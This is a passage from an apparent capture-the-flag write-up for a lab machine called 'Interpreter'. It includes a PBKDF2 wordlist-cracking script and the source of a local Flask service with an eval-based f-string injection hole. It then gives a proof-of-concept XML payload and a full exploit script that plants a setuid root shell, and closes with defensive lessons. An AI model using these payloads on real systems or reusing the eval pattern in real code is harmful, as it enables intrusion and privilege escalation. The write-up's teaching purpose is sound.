target_b64 = "u/+LBBOUnadiyFBsMOoIDPLbUR0rk59kEkPU17itdrVWA/kLMt3w+w=="
data = base64.b64decode(target_b64)
salt = data[:8]
target_dk = data[8:]
iterations = 600000
dklen = 32

def pbkdf2(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen)

wordlist = "/home/Havoc/wordlists/rockyou.txt"
bar = log.progress("Cracking PBKDF2")

with open(wordlist, errors="ignore") as f:
    for line in f:
        pwd = line.strip()
        dk = pbkdf2(pwd)
        if dk == target_dk:
            bar.success(f"Password found: {pwd}")
            break

Result: snowflake1

SSH Login: ssh

$ ssh sedric@interpreter.htb
sedric@interpreter:~$ cat user.txt
c*****************************6

ssh-login-user


4 ROOT

4.1 Internal Enumeration

LinPEAS reveals a suspicious process: root 3498 0.0 0.7 39872 31024 ? Ss 01:04 0:02 /usr/bin/python3 /usr/local/bin/notif.py

And an internal port: tcp LISTEN 0 128 127.0.0.1:54321 0.0.0.0:*

4.2 Code Review

4.2.1 Source: /usr/local/bin/notif.py

from flask import Flask, request, abort
import re, uuid, os
from datetime import datetime
import xml.etree.ElementTree as ET

app = Flask(__name__)
USER_DIR = "/var/secure-health/patients/"

def template(first, last, sender, ts, dob, gender):
    pattern = re.compile(r"^[a-zA-Z0-9._'\"(){}=+/]+$")
    for s in [first, last, sender, ts, dob, gender]:
        if not pattern.fullmatch(s):
            return "[INVALID_INPUT]"
    try:
        year_of_birth = int(dob.split('/')[-1])
    except:
        return "[INVALID_DOB]"
    template = f"Patient {first} {last} ({gender}), {{datetime.now().year - year_of_birth}} years old, received from {sender} at {ts}"
    try:
        return eval(f"f'''{template}'''")
    except Exception as e:
        return f"[EVAL_ERROR] {e}"

@app.route("/addPatient", methods=["POST"])
def receive():
    if request.remote_addr != "127.0.0.1":
        abort(403)
    xml_text = request.data.decode()
    xml_root = ET.fromstring(xml_text)
    patient = xml_root if xml_root.tag=="patient" else xml_root.find("patient")
    data = {tag: (patient.findtext(tag) or "") for tag in ["firstname","lastname","sender_app","timestamp","birth_date","gender"]}
    notification = template(data["firstname"],data["lastname"],data["sender_app"],data["timestamp"],data["birth_date"],data["gender"])
    # ... writes to /var/secure-health/patients/<uuid>.txt
    return notification

if __name__=="__main__":
    app.run("127.0.0.1",54321, threaded=True)

4.2.2 Workflow Analysis

The service builds a template string and then calls eval(f"f'''{template}'''"). This is a classic Python F-String Injection. Any {...} sequence in the input fields will be evaluated as Python code.

The regex ^[a-zA-Z0-9._'\"(){}=+/]+$ allows curly braces but blocks spaces.

4.3 Python F-String Injection

4.3.1 PoC

Construct a payload to run id: {__import__("os").popen("id").read()}

XML Payload:

<patient>
  <timestamp>0</timestamp>
  <sender_app>SmirthConnect</sender_app>
  <firstname>{__import__("os").popen("id").read()}</firstname>
  <lastname>Havoc</lastname>
  <birth_date>01/01/1970</birth_date>
  <gender>M</gender>
</patient>

Execution:

$ wget -qO- --header="Content-Type: application/xml" --post-file=poc.xml http://127.0.0.1:54321/addPatient
Patient uid=0(root) gid=0(root) groups=0(root) Havoc (M), 56 years old, received from SmirthConnect at 0

poc

4.3.2 Exploit

To bypass the space restriction, use Base64 encoding for the command.

Exploit Script (xpl.sh):

#!/bin/bash
CMD='install -o root -m 4755 /bin/bash /tmp/.sh'
ENC_CMD=$(printf '%s' "$CMD" | base64 -w0)
PAYLOAD="{__import__(\"os\").popen(__import__(\"base64\").b64decode(\"${ENC_CMD}\").decode()).read()}"

cat > /tmp/xpl.xml << EOF
<patient>
<timestamp>0</timestamp>
<sender_app>SmirthConnect</sender_app>
<firstname>${PAYLOAD}</firstname>
<lastname>Havoc</lastname>
<birth_date>01/01/1970</birth_date>
<gender>M</gender>
</patient>
EOF

wget -qO- --header="Content-Type: application/xml" --post-file=/tmp/xpl.xml http://127.0.0.1:54321/addPatient

Rooted:

sedric@interpreter:/tmp$ bash xpl.sh
sedric@interpreter:/tmp$ /tmp/.sh -p
.sh-5.2# id
uid=1000(sedric) gid=1000(sedric) euid=0(root) groups=1000(sedric)
.sh-5.2# cat /root/root.txt
0**********************************d

rooted and there you have it, pwned

pwned


5 CONCLUSION

5.1 Machine Summary

Interpretor demonstrated the critical risks associated with exposed healthcare integration platforms. This Medium-rated machine required a methodical approach combining CVE research, cryptographic analysis, and code review to achieve complete system compromise. The attack path followed a realistic scenario: exploiting a known vulnerability in internet-facing software, extracting credentials from configuration files, and leveraging insecure code execution in internal services.

5.2 Tools Used

ToolPurposeStage
RustScanFast port scanning and service enumerationReconnaissance
NmapDetailed service fingerprintingReconnaissance
Metasploit FrameworkCVE-2023-43208 exploitationInitial Access
MySQL ClientDatabase enumeration and credential extractionUser Escalation
Python (hashlib)PBKDF2 password hash crackingUser Escalation
LinPEASLinux privilege escalation enumerationPrivilege Escalation
WgetHTTP requests for F-string injection payload deliveryPrivilege Escalation
Base64Encoding bypass for command injectionPrivilege Escalation
Frame OSProfessional screenshot framing and presentationDocumentation

5.3 Key Takeaways

5.3.1 Security Lessons

1. Healthcare Integration Platforms Are High-Value Targets

  • Mirth Connect handles sensitive patient data and has extensive system access
  • Default configurations often expose administrative interfaces to the internet
  • Version disclosure makes targeted exploitation trivial

2. Java Deserialization Remains Critical

  • CVE-2023-43208 demonstrates how serialization flaws enable unauthenticated RCE
  • XStream and similar libraries require careful security configuration
  • Incomplete patches can introduce bypass opportunities

3. Configuration Files Are Goldmines

  • Mirth properties file contained database credentials and keystore passwords
  • Hardcoded credentials in plaintext enable lateral movement
  • Configuration management must include secrets rotation and encryption

4. Weak Password Hashing Is Exploitable

  • Despite using PBKDF2 with 600,000 iterations, weak passwords remain vulnerable
  • Password complexity policies must enforce strong passphrases
  • Multi-factor authentication should be mandatory for administrative access

5. Code Injection in Internal Services

  • The Python notification service used eval() with user-controlled input
  • F-string injection enabled arbitrary code execution despite input validation
  • Internal services often lack security controls assuming trusted environments

5.3.3 Defensive Recommendations

Immediate Actions:

  • Update Mirth Connect to the latest patched version
  • Disable remote administrative access or place behind VPN
  • Implement network segmentation for healthcare systems
  • Enable comprehensive logging and monitoring

Long-Term Mitigations:

  • Deploy Web Application Firewall (WAF) with deserialization attack signatures
  • Implement certificate-based authentication for Mirth administrators
  • Use secrets management solutions (HashiCorp Vault, AWS Secrets Manager)
  • Enforce multi-factor authentication on all administrative interfaces
  • Conduct regular penetration testing of healthcare infrastructure
  • Implement least-privilege principles for service accounts

Code Security:

  • Never use eval() with user-controlled input
  • Validate and sanitize all external data before processing
  • Use parameterized queries and prepared statements
  • Implement proper input validation beyond regex patterns
  • Apply security linters and SAST tools in CI/CD pipelines

5.4 Final Thoughts

This machine showcases a realistic attack scenario targeting healthcare infrastructure. The exploitation path from internet-facing vulnerability to root access mirrors real-world breaches in medical environments. Organizations running integration platforms must prioritize patching, credential management, and defense-in-depth strategies. The combination of CVE exploitation, cryptographic attacks, and code injection demonstrates why layered security controls are essential—a single vulnerability should never grant complete system compromise.

Stay secure, stay curious, and keep hacking responsibly! 🛡️